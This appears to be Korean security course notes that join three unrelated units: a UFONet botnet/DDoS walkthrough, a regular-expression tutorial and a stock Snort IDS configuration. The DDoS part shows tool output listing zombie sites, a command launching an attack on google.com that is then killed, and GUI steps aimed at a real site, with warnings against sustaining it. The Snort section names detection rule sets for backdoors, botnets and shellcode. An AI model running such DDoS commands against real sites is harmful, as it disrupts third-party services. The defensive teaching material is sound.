[Info] Attacking from: www.gamengame.com

[Info] Attacking from: brangerbriz.net

[Info] Attacking from: whitehousesurgery.org

[Info] Attacking from: msdn.developer-works.com

[Info] Attacking from: www.dog-ryusen.com

[Info] Attacking from: www.jerrywho.de

[Info] Attacking from: www.webdeveloper.com

[Info] Attacking from: www.dietistdenennie.nl

[Info] Attacking from: www.xmarks.com

[Info] Attacking from: www.sealyham.sk

[Info] Attacking from: www.nobelprize.org

[Info] Attacking from: www.haberoku.com

[Info] Attacking from: www.foiredelibramont.com

[Info] Attacking from: my.pdx.edu

[Info] Attacking from: engagethepower.org

[Info] Attacking from: lovenest.ru

[Info] Attacking from: ckthonon.free.fr

..... (중략) .....

[Info] Attacking from: www.metamodpro.com

[Info] Attacking from: www.otohaya.com

[Info] Attacking from: www.scafco.com

[Info] Attacking from: 7ba.ru

[Info] Attacking from: business.louisville.edu

[Info] Attacking from: evoec.com

[Info] Attacking from: www.jotform.com

[Info] Attacking from: msdn.developer-works.com

[Info] Attacking from: www2.ogs.state.ny.us

..... (중략) .....

[1]+ Stopped ./ufonet -a http://www.google.com

-> 공격은 잠깐만 확인해 보고 끊어야 한다.

-> 지속적으로 공격하면 안된다.

# kill %1

[1]+ Stopped ./ufonet -a http://www.google.com

# jobs

[1]+ Terminated ./ufonet -a http://www.google.com

# jobs

#

⑦ ufonet GUI 툴을 실행하여 공격 작업을 진행

# ./ufonet --gui

<START MOTHERSHIP!> 선택

<Wormhole> 부분에 마우스 포인터를 올린다.

<Wormhole> 부분에 마우스 포인터를 올리면 다양한 메뉴가 나온다.

그 중에서 <Botnet> 부분을 선택한다.

<List 'zombies'> 선택하고 화면의 하단 부분으로 스크롤하여 확인한다.

<Attack> 부분을 선택한다.

Set your target:

http://www.soldesk.com

Set place to attack:

/path/big.jpg

Set your target: http://www.soldesk.com

Set place to attack

(주의) 절대 START 하면 안된다.

⑧ Botnet/DDoS Attack - Norse Live Footage REALTIME 1 APRIL 2015 LIVE

다음 웹사이트에 접속한다.

http://map.norsecorp.com/

[참고 URL]

How to create botnets for DDoS attacks (2015) using Kali linux

- https://www.youtube.com/watch?v=xCqHxz4ufvo

Botnet / DDoS Attack - Norse Live Footage REALTIME 1 APRIL 2015 LIVE

- https://www.youtube.com/watch?v=quGv7Bf5BiY

- http://map.norsecorp.com/

PCRE(Perl Compatible Regular Expression)

1. 정규 표현식이란?

● 정규표현식(Regualr Expression)은 특정한 규칙을 가진 문자열의 집합을 표현하는데 사용하는 형식 언어이다.

● 정규 표현식은 많은 텍스트 편집기와 프로그래밍 언어에서 문자열의 검색 치환을 위해 지원된다.

2. 실습을 위한 준비(필요한 프로그램 - 윈도우용)

적당한 프로그램 다운로드 받고 설치한다.

- (유료) RegexBuddy(http://www.regexbuddy.com/)

or

- (무료) Rad.RegexDesigner(http://www.radsoftware.com.au/regexdesigner/)

-> 공유디렉토리 사용

3. 메타 문자(Metacharacter) 종류와 의미

■ 메타문자: .

● "\n"을 제외한 모든 단일 문자를 찾는다.
"\n"을 포함한 모든 문자를 찾으려면 '[.\n]' 패턴을 사용함

[실습] .

표현식 h.t

문자열 hat halt hit heat hot

■ 메타문자: ?

● ? 문자 바로 앞에 있는 문자가 0 또는 1회 반복되는 것을 가리킨다.

[실습]

표현식 ha?t

문자열 ht hit hat hot haat hut haaaaat

■ 메타문자: *

● 앞의 문자를 0회 이상을 반복한다.

[실습]

표현식 ha*t

문자열 ht hit hat hot haat hut haaaat

■ 메타문자: +

● 앞의 문자를 1회 이상을 반복한다.

[실습]

표현식 ha+t

문자열 ht hit hat hot haat hut haaaaat

■ 메타문자: ^

● ^은 줄의 제일 처음(시작위치)을 카리킨다.

● 입력 문자열의 시작 위치를 찾음. Multiline 속성이 설정되어 있으면 '\n' 또는 '\r' 앞의 위치를 찾는다.

[실습]

표현식 ^h.t

문자열 hat hit hot

■ 메타문자: $

● $는 줄의 제일 마지막(끝 위치)을 가리킨다.

● 입력 문자열의 끝 위치를 찾음. Multiline 속성이 설정되어 있으면 '\n' 또는 '\r' 뒤의 위치를 찾는다.

[실습]

표현식 h.t$

문자열 hat hit hot

■ 메타문자: (pattern)

● 정규식 내에서 패턴을 그룹화 한다.

● 특정 패턴을 묶어서 반복 기호등과 함께 사용한다.

● 여러 문자 중 하나만 선택적으로 매칭하고자 할 때 사용

[실습]

표현식 ba(na)*

문자열 ba na bana banana nana bananana

표현식 ba(na)+

문자열 ba na bana banana nana bananana

■ 메타문자: (|)

● | 기호를 기준으로 앞뒤의 값들 중의 하나 선택

● 괄호로 묶인 그룹 내에서 | 으로 나뉘어진 여러개의 패턴 중 하나와 일치하는 것을 가리킨다.

[실습]

표현식 (eg|sa|be)g

문자열 egg eng sag sig beg bag

■ 메타문자: {n}

● 바로 앞의 문자를 정확히 n번 반복한다.

[실습]

표현식 ha{2}t

문자열 ht hit hat hot haat hut haaaaat

■ 메타문자: {n,}

● 바로 앞의 문자를 n번 이상 반복 한다.

{0,}는 별표(*)와 같은 의미이다.

{1,}는 더하기(+)와 같은 의미이다.

{0,1}는 물음표(?)와 같은 의미이다.

[실습]

표현식 ha{2,}t

문자열 ht hit hat hot haat hut haaaaat

■ 메타문자: {n,m}

● 바로 앞의 문자를 n번 이상 m회 이하 반복 한다.

[실습]

표현식 ha{2,4}t

문자열 ht hat haat haaat haaaat haaaaat

■ 문자 집합: []

● 괄호 안의 문자 중 하나를 찾는다.

[abc] a, b, c 중 하나

[a-z] 알파벳 소문자 중 하나

[0-9] 숫자 중 하나

[a-zA-Z] 알파벳 소문자나 대문자 중 하나

[실습]

표현식 h[aiu]t

문자열 hat het hit hot hut

■ 메타문자: [^xyz]

● [^]은 안에 있는 문자를 제외한 문자중 하나를 가리킨다.

[^abc] a,b,c 이외의 문자 중 하나

[^a-z] 알파벳 소문자 이외의 문자 중 하나

[^0-9] 숫자 이외의 문자 중 하나

[^a-zA-Z] 알파벳 소문자나 대문자 이외의 문자 중 하나

[실습]

표현식 h[^aiu]t

문자열 hat het hit hot hut

snort architecture & snort rules

다음 내용은 "기업정보호전문가 양성과정 시스템 정보보안 기술 실무" 책의 일부 내용입니다.

Snort 설치 및 운영 방법

CentOS 6.X에 Snort 설치하기

- 참고 페이지 https://www.snort.org/#get-started

- 참고 페이지 http://www.youtube.com/watch?v=DYBfCyd6cC0

[참고] snort.conf 예제 파일(http://labs.snort.org/snort/2956/snort.conf)

#--------------------------------------------------

# VRT Rule Packages Snort.conf

#

# For more information visit us at:

# http://www.snort.org Snort Website

# http://vrt-blog.snort.org/ Sourcefire VRT Blog

#

# Mailing list Contact: snort-sigs@lists.sourceforge.net

# False Positive reports: fp@sourcefire.com

# Snort bugs: bugs@snort.org

#

# Compatible with Snort Versions:

# VERSIONS : 2.9.5.6

#

# Snort build options:

# OPTIONS : --enable-gre --enable-mpls --enable-targetbased --enable-ppm --enable-perfprofiling

# --enable-zlib --enable-active-response --enable-normalizer --enable-reload --enable-react

# --enable-flexresp3

#

# Additional information:

# This configuration file enables active response, to run snort in

# test mode -T you are required to supply an interface -i <interface>

# or test mode will fail to fully validate the configuration and

# exit with a FATAL error

#--------------------------------------------------

###################################################

# This file contains a sample snort configuration.

# You should take the following steps to create your own custom configuration:

#

# 1) Set the network variables.

# 2) Configure the decoder

# 3) Configure the base detection engine

# 4) Configure dynamic loaded libraries

# 5) Configure preprocessors

# 6) Configure output plugins

# 7) Customize your rule set

# 8) Customize preprocessor and decoder rule set

# 9) Customize shared object rule set

###################################################

# Step #1: Set the network variables. For more information, see README.variables

###################################################

# Setup the network addresses you are protecting

ipvar HOME_NET any

# Set up the external network addresses. Leave as "any" in most situations

ipvar EXTERNAL_NET any

# List of DNS servers on your network

ipvar DNS_SERVERS $HOME_NET

# List of SMTP servers on your network

ipvar SMTP_SERVERS $HOME_NET

# List of web servers on your network

ipvar HTTP_SERVERS $HOME_NET

# List of sql servers on your network

ipvar SQL_SERVERS $HOME_NET

# List of telnet servers on your network

ipvar TELNET_SERVERS $HOME_NET

# List of ssh servers on your network

ipvar SSH_SERVERS $HOME_NET

# List of ftp servers on your network

ipvar FTP_SERVERS $HOME_NET

# List of sip servers on your network

ipvar SIP_SERVERS $HOME_NET

# List of ports you run web servers on

portvar HTTP_PORTS [36,80,81,82,83,84,85,86,87,88,89,90,311,383,555,591,593,631,801,808,818,901,972,1158,1220,1414,1533,1741,1830,1942,2231,2301,2381,2578,2809,2980,3029,3037,3057,3128,3443,3702,4000,4343,4848,5000,5117,5250,5600,6080,6173,6988,7000,7001,7071,7144,7145,7510,7770,7777,7778,7779,8000,8008,8014,8028,8080,8081,8082,8085,8088,8090,8118,8123,8180,8181,8222,8243,8280,8300,8333,8344,8500,8509,8800,8888,8899,8983,9000,9060,9080,9090,9091,9111,9290,9443,9999,10000,11371,12601,13014,15489,29991,33300,34412,34443,34444,41080,44449,50000,50002,51423,53331,55252,55555,56712]

# List of ports you want to look for SHELLCODE on.

portvar SHELLCODE_PORTS !80

# List of ports you might see oracle attacks on

portvar ORACLE_PORTS 1024:

# List of ports you want to look for SSH connections on:

portvar SSH_PORTS 22

# List of ports you run ftp servers on

portvar FTP_PORTS [21,2100,3535]

# List of ports you run SIP servers on

portvar SIP_PORTS [5060,5061,5600]

# List of file data ports for file inspection

portvar FILE_DATA_PORTS [$HTTP_PORTS,110,143]

# List of GTP ports for GTP preprocessor

portvar GTP_PORTS [2123,2152,3386]

# other variables, these should not be modified

ipvar AIM_SERVERS [64.12.24.0/23,64.12.28.0/23,64.12.161.0/24,64.12.163.0/24,64.12.200.0/24,205.188.3.0/24,205.188.5.0/24,205.188.7.0/24,205.188.9.0/24,205.188.153.0/24,205.188.179.0/24,205.188.248.0/24]

# Path to your rules files (this can be a relative path)

# Note for Windows users: You are advised to make this an absolute path,

# such as: c:\snort\rules

var RULE_PATH ../rules

var SO_RULE_PATH ../so_rules

var PREPROC_RULE_PATH ../preproc_rules

# If you are using reputation preprocessor set these

var WHITE_LIST_PATH ../rules

var BLACK_LIST_PATH ../rules

###################################################

# Step #2: Configure the decoder. For more information, see README.decode

###################################################

# Stop generic decode events:

config disable_decode_alerts

# Stop Alerts on experimental TCP options

config disable_tcpopt_experimental_alerts

# Stop Alerts on obsolete TCP options

config disable_tcpopt_obsolete_alerts

# Stop Alerts on T/TCP alerts

config disable_tcpopt_ttcp_alerts

# Stop Alerts on all other TCPOption type events:

config disable_tcpopt_alerts

# Stop Alerts on invalid ip options

config disable_ipopt_alerts

# Alert if value in length field (IP, TCP, UDP) is greater th elength of the packet

# config enable_decode_oversized_alerts

# Same as above, but drop packet if in Inline mode (requires enable_decode_oversized_alerts)

# config enable_decode_oversized_drops

# Configure IP / TCP checksum mode

config checksum_mode: all

# Configure maximum number of flowbit references. For more information, see README.flowbits

# config flowbits_size: 64

# Configure ports to ignore

# config ignore_ports: tcp 21 6667:6671 1356

# config ignore_ports: udp 1:17 53

# Configure active response for non inline operation. For more information, see REAMDE.active

# config response: eth0 attempts 2

# Configure DAQ related options for inline operation. For more information, see README.daq

#

# config daq: <type>

# config daq_dir: <dir>

# config daq_mode: <mode>

# config daq_var: <var>

#

# <mode> ::= read-file | passive | inline

# <var> ::= arbitrary <name>=<value passed to DAQ

# <dir> ::= path as to where to look for DAQ module so's

# Configure specific UID and GID to run snort as after dropping privs. For more information see snort -h command line options

#

# config set_gid:

# config set_uid:

# Configure default snaplen. Snort defaults to MTU of in use interface. For more information see README

#

# config snaplen:

#

# Configure default bpf_file to use for filtering what traffic reaches snort. For more information see snort -h command line options (-F)

#

# config bpf_file:

#

# Configure default log directory for snort to log to. For more information see snort -h command line options (-l)

#

# config logdir:

###################################################

# Step #3: Configure the base detection engine. For more information, see README.decode

###################################################

# Configure PCRE match limitations

config pcre_match_limit: 3500

config pcre_match_limit_recursion: 1500

# Configure the detection engine See the Snort Manual, Configuring Snort - Includes - Config

config detection: search-method ac-split search-optimize max-pattern-len 20

# Configure the event queue. For more information, see README.event_queue

config event_queue: max_queue 8 log 5 order_events content_length

###################################################

## Configure GTP if it is to be used.

## For more information, see README.GTP

####################################################

# config enable_gtp

###################################################

# Per packet and rule latency enforcement

# For more information see README.ppm

###################################################

# Per Packet latency configuration

#config ppm: max-pkt-time 250, \

# fastpath-expensive-packets, \

# pkt-log

# Per Rule latency configuration

#config ppm: max-rule-time 200, \

# threshold 3, \

# suspend-expensive-rules, \

# suspend-timeout 20, \

# rule-log alert

###################################################

# Configure Perf Profiling for debugging

# For more information see README.PerfProfiling

###################################################

#config profile_rules: print all, sort avg_ticks

#config profile_preprocs: print all, sort avg_ticks

###################################################

# Configure protocol aware flushing

# For more information see README.stream5

###################################################

config paf_max: 16000

###################################################

# Step #4: Configure dynamic loaded libraries.

# For more information, see Snort Manual, Configuring Snort - Dynamic Modules

###################################################

# path to dynamic preprocessor libraries

dynamicpreprocessor directory /usr/local/lib/snort_dynamicpreprocessor/

# path to base preprocessor engine

dynamicengine /usr/local/lib/snort_dynamicengine/libsf_engine.so

# path to dynamic rules libraries

dynamicdetection directory /usr/local/lib/snort_dynamicrules

###################################################

# Step #5: Configure preprocessors

# For more information, see the Snort Manual, Configuring Snort - Preprocessors

###################################################

# GTP Control Channle Preprocessor. For more information, see README.GTP

# preprocessor gtp: ports { 2123 3386 2152 }

# Inline packet normalization. For more information, see README.normalize

# Does nothing in IDS mode

preprocessor normalize_ip4

preprocessor normalize_tcp: ips ecn stream

preprocessor normalize_icmp4

preprocessor normalize_ip6

preprocessor normalize_icmp6

# Target-based IP defragmentation. For more inforation, see README.frag3

preprocessor frag3_global: max_frags 65536

preprocessor frag3_engine: policy windows detect_anomalies overlap_limit 10 min_fragment_length 100 timeout 180

# Target-Based stateful inspection/stream reassembly. For more inforation, see README.stream5

preprocessor stream5_global: track_tcp yes, \

track_udp yes, \

track_icmp no, \

max_tcp 262144, \

max_udp 131072, \

max_active_responses 2, \

min_response_seconds 5

preprocessor stream5_tcp: policy windows, detect_anomalies, require_3whs 180, \

overlap_limit 10, small_segments 3 bytes 150, timeout 180, \

ports client 21 22 23 25 42 53 70 79 109 110 111 113 119 135 136 137 139 143 \

161 445 513 514 587 593 691 1433 1521 1741 2100 3306 6070 6665 6666 6667 6668 6669 \

7000 8181 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779, \

ports both 36 80 81 82 83 84 85 86 87 88 89 90 110 311 383 443 465 563 555 591 593 631 636 801 808 818 901 972 989 992 993 994 995 1158 1220 1414 1533 1741 1830 1942 2231 2301 2381 2578 2809 2980 3029 3037 3057 3128 3443 3702 4000 4343 4848 5000 5117 5250 5600 6080 6173 6988 7907 7000 7001 7071 7144 7145 7510 7802 7770 7777 7778 7779 \

7801 7900 7901 7902 7903 7904 7905 7906 7908 7909 7910 7911 7912 7913 7914 7915 7916 \

7917 7918 7919 7920 8000 8008 8014 8028 8080 8081 8082 8085 8088 8090 8118 8123 8180 8181 8222 8243 8280 8300 8333 8344 8500 8509 8800 8888 8899 8983 9000 9060 9080 9090 9091 9111 9290 9443 9999 10000 11371 12601 13014 15489 29991 33300 34412 34443 34444 41080 44449 50000 50002 51423 53331 55252 55555 56712

preprocessor stream5_udp: timeout 180

# performance statistics. For more information, see the Snort Manual, Configuring Snort - Preprocessors - Performance Monitor

# preprocessor perfmonitor: time 300 file /var/snort/snort.stats pktcnt 10000

# HTTP normalization and anomaly detection. For more information, see README.http_inspect

preprocessor http_inspect: global iis_unicode_map unicode.map 1252 compress_depth 65535 decompress_depth 65535

preprocessor http_inspect_server: server default \

http_methods { GET POST PUT SEARCH MKCOL COPY MOVE LOCK UNLOCK NOTIFY POLL BCOPY BDELETE BMOVE LINK UNLINK OPTIONS HEAD DELETE TRACE TRACK CONNECT SOURCE SUBSCRIBE UNSUBSCRIBE PROPFIND PROPPATCH BPROPFIND BPROPPATCH RPC_CONNECT PROXY_SUCCESS BITS_POST CCM_POST SMS_POST RPC_IN_DATA RPC_OUT_DATA RPC_ECHO_DATA } \

chunk_length 500000 \

server_flow_depth 0 \

client_flow_depth 0 \

post_depth 65495 \

oversize_dir_length 500 \

max_header_length 750 \

max_headers 100 \

max_spaces 200 \

small_chunk_length { 10 5 } \

ports { 36 80 81 82 83 84 85 86 87 88 89 90 311 383 555 591 593 631 801 808 818 901 972 1158 1220 1414 1533 1741 1830 1942 2231 2301 2381 2578 2809 2980 3029 3037 3057 3128 3443 3702 4000 4343 4848 5000 5117 5250 5600 6080 6173 6988 7000 7001 7071 7144 7145 7510 7770 7777 7778 7779 8000 8008 8014 8028 8080 8081 8082 8085 8088 8090 8118 8123 8180 8181 8222 8243 8280 8300 8333 8344 8500 8509 8800 8888 8899 8983 9000 9060 9080 9090 9091 9111 9290 9443 9999 10000 11371 12601 13014 15489 29991 33300 34412 34443 34444 41080 44449 50000 50002 51423 53331 55252 55555 56712 } \

non_rfc_char { 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 } \

enable_cookie \

extended_response_inspection \

inspect_gzip \

normalize_utf \

unlimited_decompress \

normalize_javascript \

apache_whitespace no \

ascii no \

bare_byte no \

directory no \

double_decode no \

iis_backslash no \

iis_delimiter no \

iis_unicode no \

multi_slash no \

utf_8 no \

u_encode yes \

webroot no

# ONC-RPC normalization and anomaly detection. For more information, see the Snort Manual, Configuring Snort - Preprocessors - RPC Decode

preprocessor rpc_decode: 111 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 no_alert_multiple_requests no_alert_large_fragments no_alert_incomplete

# Back Orifice detection.

preprocessor bo

# FTP / Telnet normalization and anomaly detection. For more information, see README.ftptelnet

preprocessor ftp_telnet: global inspection_type stateful encrypted_traffic no check_encrypted

preprocessor ftp_telnet_protocol: telnet \

ayt_attack_thresh 20 \

normalize ports { 23 } \

detect_anomalies

preprocessor ftp_telnet_protocol: ftp server default \

def_max_param_len 100 \

ports { 21 2100 3535 } \

telnet_cmds yes \

ignore_telnet_erase_cmds yes \

ftp_cmds { ABOR ACCT ADAT ALLO APPE AUTH CCC CDUP } \

ftp_cmds { CEL CLNT CMD CONF CWD DELE ENC EPRT } \

ftp_cmds { EPSV ESTA ESTP FEAT HELP LANG LIST LPRT } \

ftp_cmds { LPSV MACB MAIL MDTM MIC MKD MLSD MLST } \

ftp_cmds { MODE NLST NOOP OPTS PASS PASV PBSZ PORT } \

ftp_cmds { PROT PWD QUIT REIN REST RETR RMD RNFR } \

ftp_cmds { RNTO SDUP SITE SIZE SMNT STAT STOR STOU } \

ftp_cmds { STRU SYST TEST TYPE USER XCUP XCRC XCWD } \

ftp_cmds { XMAS XMD5 XMKD XPWD XRCP XRMD XRSQ XSEM } \

ftp_cmds { XSEN XSHA1 XSHA256 } \

alt_max_param_len 0 { ABOR CCC CDUP ESTA FEAT LPSV NOOP PASV PWD QUIT REIN STOU SYST XCUP XPWD } \

alt_max_param_len 200 { ALLO APPE CMD HELP NLST RETR RNFR STOR STOU XMKD } \

alt_max_param_len 256 { CWD RNTO } \

alt_max_param_len 400 { PORT } \

alt_max_param_len 512 { SIZE } \

chk_str_fmt { ACCT ADAT ALLO APPE AUTH CEL CLNT CMD } \

chk_str_fmt { CONF CWD DELE ENC EPRT EPSV ESTP HELP } \

chk_str_fmt { LANG LIST LPRT MACB MAIL MDTM MIC MKD } \

chk_str_fmt { MLSD MLST MODE NLST OPTS PASS PBSZ PORT } \

chk_str_fmt { PROT REST RETR RMD RNFR RNTO SDUP SITE } \

chk_str_fmt { SIZE SMNT STAT STOR STRU TEST TYPE USER } \

chk_str_fmt { XCRC XCWD XMAS XMD5 XMKD XRCP XRMD XRSQ } \

chk_str_fmt { XSEM XSEN XSHA1 XSHA256 } \

cmd_validity ALLO < int [ char R int ] > \

cmd_validity EPSV < [ { char 12 | char A char L char L } ] > \

cmd_validity MACB < string > \

cmd_validity MDTM < [ date nnnnnnnnnnnnnn[.n[n[n]]] ] string > \

cmd_validity MODE < char ASBCZ > \

cmd_validity PORT < host_port > \

cmd_validity PROT < char CSEP > \

cmd_validity STRU < char FRPO [ string ] > \

cmd_validity TYPE < { char AE [ char NTC ] | char I | char L [ number ] } >

preprocessor ftp_telnet_protocol: ftp client default \

max_resp_len 256 \

bounce yes \

ignore_telnet_erase_cmds yes \

telnet_cmds yes

# SMTP normalization and anomaly detection. For more information, see README.SMTP

preprocessor smtp: ports { 25 465 587 691 } \

inspection_type stateful \

b64_decode_depth 0 \

qp_decode_depth 0 \

bitenc_decode_depth 0 \

uu_decode_depth 0 \

log_mailfrom \

log_rcptto \

log_filename \

log_email_hdrs \

normalize cmds \

normalize_cmds { ATRN AUTH BDAT CHUNKING DATA DEBUG EHLO EMAL ESAM ESND ESOM ETRN EVFY } \

normalize_cmds { EXPN HELO HELP IDENT MAIL NOOP ONEX QUEU QUIT RCPT RSET SAML SEND SOML } \

normalize_cmds { STARTTLS TICK TIME TURN TURNME VERB VRFY X-ADAT X-DRCP X-ERCP X-EXCH50 } \

normalize_cmds { X-EXPS X-LINK2STATE XADR XAUTH XCIR XEXCH50 XGEN XLICENSE XQUE XSTA XTRN XUSR } \

max_command_line_len 512 \

max_header_line_len 1000 \

max_response_line_len 512 \

alt_max_command_line_len 260 { MAIL } \

alt_max_command_line_len 300 { RCPT } \

alt_max_command_line_len 500 { HELP HELO ETRN EHLO } \

alt_max_command_line_len 255 { EXPN VRFY ATRN SIZE BDAT DEBUG EMAL ESAM ESND ESOM EVFY IDENT NOOP RSET } \

alt_max_command_line_len 246 { SEND SAML SOML AUTH TURN ETRN DATA RSET QUIT ONEX QUEU STARTTLS TICK TIME TURNME VERB X-EXPS X-LINK2STATE XADR XAUTH XCIR XEXCH50 XGEN XLICENSE XQUE XSTA XTRN XUSR } \

valid_cmds { ATRN AUTH BDAT CHUNKING DATA DEBUG EHLO EMAL ESAM ESND ESOM ETRN EVFY } \

valid_cmds { EXPN HELO HELP IDENT MAIL NOOP ONEX QUEU QUIT RCPT RSET SAML SEND SOML } \

valid_cmds { STARTTLS TICK TIME TURN TURNME VERB VRFY X-ADAT X-DRCP X-ERCP X-EXCH50 } \

valid_cmds { X-EXPS X-LINK2STATE XADR XAUTH XCIR XEXCH50 XGEN XLICENSE XQUE XSTA XTRN XUSR } \

xlink2state { enabled }

# Portscan detection. For more information, see README.sfportscan

# preprocessor sfportscan: proto { all } memcap { 10000000 } sense_level { low }

# ARP spoof detection. For more information, see the Snort Manual - Configuring Snort - Preprocessors - ARP Spoof Preprocessor

# preprocessor arpspoof

# preprocessor arpspoof_detect_host: 192.168.40.1 f0:0f:00:f0:0f:00

# SSH anomaly detection. For more information, see README.ssh

preprocessor ssh: server_ports { 22 } \

autodetect \

max_client_bytes 19600 \

max_encrypted_packets 20 \

max_server_version_len 100 \

enable_respoverflow enable_ssh1crc32 \

enable_srvoverflow enable_protomismatch

# SMB / DCE-RPC normalization and anomaly detection. For more information, see README.dcerpc2

preprocessor dcerpc2: memcap 102400, events [co ]

preprocessor dcerpc2_server: default, policy WinXP, \

detect [smb [139,445], tcp 135, udp 135, rpc-over-http-server 593], \

autodetect [tcp 1025:, udp 1025:, rpc-over-http-server 1025:], \

smb_max_chain 3, smb_invalid_shares ["C$", "D$", "ADMIN$"]

# DNS anomaly detection. For more information, see README.dns

preprocessor dns: ports { 53 } enable_rdata_overflow

# SSL anomaly detection and traffic bypass. For more information, see README.ssl

preprocessor ssl: ports { 443 465 563 636 989 992 993 994 995 5061 7801 7802 7900 7901 7902 7903 7904 7905 7906 7907 7908 7909 7910 7911 7912 7913 7914 7915 7916 7917 7918 7919 7920 }, trustservers, noinspect_encrypted

# SDF sensitive data preprocessor. For more information see README.sensitive_data

preprocessor sensitive_data: alert_threshold 25

# SIP Session Initiation Protocol preprocessor. For more information see README.sip

preprocessor sip: max_sessions 40000, \

ports { 5060 5061 5600 }, \

methods { invite \

cancel \

ack \

bye \

register \

options \

refer \

subscribe \

update \

join \

info \

message \

notify \

benotify \

do \

qauth \

sprack \

publish \

service \

unsubscribe \

prack }, \

max_uri_len 512, \

max_call_id_len 80, \

max_requestName_len 20, \

max_from_len 256, \

max_to_len 256, \

max_via_len 1024, \

max_contact_len 512, \

max_content_len 2048

# IMAP preprocessor. For more information see README.imap

preprocessor imap: \

ports { 143 } \

b64_decode_depth 0 \

qp_decode_depth 0 \

bitenc_decode_depth 0 \

uu_decode_depth 0

# POP preprocessor. For more information see README.pop

preprocessor pop: \

ports { 110 } \

b64_decode_depth 0 \

qp_decode_depth 0 \

bitenc_decode_depth 0 \

uu_decode_depth 0

# Modbus preprocessor. For more information see README.modbus

preprocessor modbus: ports { 502 }

# DNP3 preprocessor. For more information see README.dnp3

preprocessor dnp3: ports { 20000 } \

memcap 262144 \

check_crc

# Reputation preprocessor. For more information see README.reputation

preprocessor reputation: \

memcap 500, \

priority whitelist, \

nested_ip inner, \

whitelist $WHITE_LIST_PATH/white_list.rules, \

blacklist $BLACK_LIST_PATH/black_list.rules

###################################################

# Step #6: Configure output plugins

# For more information, see Snort Manual, Configuring Snort - Output Modules

###################################################

# unified2

# Recommended for most installs

# output unified2: filename merged.log, limit 128, nostamp, mpls_event_types, vlan_event_types

# Additional configuration for specific types of installs

# output alert_unified2: filename snort.alert, limit 128, nostamp

# output log_unified2: filename snort.log, limit 128, nostamp

# syslog

# output alert_syslog: LOG_AUTH LOG_ALERT

# pcap

# output log_tcpdump: tcpdump.log

# metadata reference data. do not modify these lines

include classification.config

include reference.config

###################################################

# Step #7: Customize your rule set

# For more information, see Snort Manual, Writing Snort Rules

#

# NOTE: All categories are enabled in this conf file

###################################################

# site specific rules

include $RULE_PATH/local.rules

include $RULE_PATH/file-identify.rules

include $RULE_PATH/app-detect.rules

include $RULE_PATH/attack-responses.rules

include $RULE_PATH/backdoor.rules

include $RULE_PATH/bad-traffic.rules

include $RULE_PATH/blacklist.rules

include $RULE_PATH/botnet-cnc.rules

include $RULE_PATH/browser-chrome.rules

include $RULE_PATH/browser-firefox.rules

include $RULE_PATH/browser-ie.rules

include $RULE_PATH/browser-other.rules

include $RULE_PATH/browser-plugins.rules

include $RULE_PATH/browser-webkit.rules

include $RULE_PATH/chat.rules

include $RULE_PATH/content-replace.rules

include $RULE_PATH/ddos.rules

include $RULE_PATH/dns.rules

include $RULE_PATH/dos.rules

include $RULE_PATH/experimental.rules

include $RULE_PATH/exploit-kit.rules

include $RULE_PATH/exploit.rules

include $RULE_PATH/file-executable.rules

include $RULE_PATH/file-flash.rules

include $RULE_PATH/file-image.rules

include $RULE_PATH/file-java.rules

include $RULE_PATH/file-multimedia.rules

include $RULE_PATH/file-office.rules

include $RULE_PATH/file-other.rules

include $RULE_PATH/file-pdf.rules

include $RULE_PATH/finger.rules

include $RULE_PATH/ftp.rules

include $RULE_PATH/icmp-info.rules

include $RULE_PATH/icmp.rules

include $RULE_PATH/imap.rules

include $RULE_PATH/indicator-compromise.rules

include $RULE_PATH/indicator-obfuscation.rules

include $RULE_PATH/indicator-scan.rules

include $RULE_PATH/indicator-shellcode.rules

include $RULE_PATH/info.rules

include $RULE_PATH/malware-backdoor.rules

include $RULE_PATH/malware-cnc.rules

include $RULE_PATH/malware-other.rules

include $RULE_PATH/malware-tools.rules

include $RULE_PATH/misc.rules

include $RULE_PATH/multimedia.rules

include $RULE_PATH/mysql.rules

include $RULE_PATH/netbios.rules

include $RULE_PATH/nntp.rules

include $RULE_PATH/oracle.rules

include $RULE_PATH/os-linux.rules

include $RULE_PATH/os-mobile.rules

include $RULE_PATH/os-other.rules

include $RULE_PATH/os-solaris.rules

include $RULE_PATH/os-windows.rules

include $RULE_PATH/other-ids.rules

include $RULE_PATH/p2p.rules

include $RULE_PATH/phishing-spam.rules

include $RULE_PATH/policy-multimedia.rules

include $RULE_PATH/policy-other.rules

include $RULE_PATH/policy.rules

include $RULE_PATH/policy-social.rules

include $RULE_PATH/policy-spam.rules

include $RULE_PATH/pop2.rules

include $RULE_PATH/pop3.rules

include $RULE_PATH/protocol-dns.rules

include $RULE_PATH/protocol-finger.rules

include $RULE_PATH/protocol-ftp.rules

include $RULE_PATH/protocol-icmp.rules

include $RULE_PATH/protocol-imap.rules

include $RULE_PATH/protocol-nntp.rules

include $RULE_PATH/protocol-other.rules

include $RULE_PATH/protocol-pop.rules

include $RULE_PATH/protocol-rpc.rules

include $RULE_PATH/protocol-scada.rules

include $RULE_PATH/protocol-services.rules

include $RULE_PATH/protocol-snmp.rules

include $RULE_PATH/protocol-telnet.rules

include $RULE_PATH/protocol-tftp.rules

include $RULE_PATH/protocol-voip.rules

include $RULE_PATH/pua-adware.rules

include $RULE_PATH/pua-other.rules

include $RULE_PATH/pua-p2p.rules

include $RULE_PATH/pua-toolbars.rules

include $RULE_PATH/rpc.rules

include $RULE_PATH/rservices.rules

include $RULE_PATH/scada.rules

include $RULE_PATH/scan.rules

include $RULE_PATH/server-apache.rules

include $RULE_PATH/server-iis.rules

include $RULE_PATH/server-mail.rules

include $RULE_PATH/server-mssql.rules

include $RULE_PATH/server-mysql.rules

include $RULE_PATH/server-oracle.rules

include $RULE_PATH/server-other.rules

include $RULE_PATH/server-samba.rules

include $RULE_PATH/server-webapp.rules

include $RULE_PATH/shellcode.rules

include $RULE_PATH/smtp.rules

include $RULE_PATH/snmp.rules

include $RULE_PATH/specific-threats.rules

include $RULE_PATH/spyware-put.rules

include $RULE_PATH/sql.rules

include $RULE_PATH/telnet.rules

include $RULE_PATH/tftp.rules

include $RULE_PATH/virus.rules

include $RULE_PATH/voip.rules

include $RULE_PATH/web-activex.rules

include $RULE_PATH/web-attacks.rules

include $RULE_PATH/web-cgi.rules

include $RULE_PATH/web-client.rules

include $RULE_PATH/web-coldfusion.rules

include $RULE_PATH/web-frontpage.rules

include $RULE_PATH/web-iis.rules

include $RULE_PATH/web-misc.rules
